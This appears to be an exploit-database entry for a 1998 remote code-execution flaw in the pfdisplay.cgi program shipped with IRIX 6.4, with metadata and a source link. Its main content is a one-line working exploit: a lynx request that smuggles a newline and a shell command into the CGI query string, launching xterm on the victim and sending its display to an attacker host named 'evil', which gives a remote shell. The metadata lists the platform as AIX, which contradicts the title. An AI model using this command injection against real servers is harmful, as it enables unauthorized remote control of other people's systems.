IRIX 6.4 - 'pfdisplay.cgi' Code Execution

Author: J.A. Gutierrez
type: remote
platform: aix
port: nan
date_added: 1998-04-07 
date_updated: 2017-11-22 
verified: 1 
codes: OSVDB-82935;OSVDB-134 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/64/info

There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.

$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'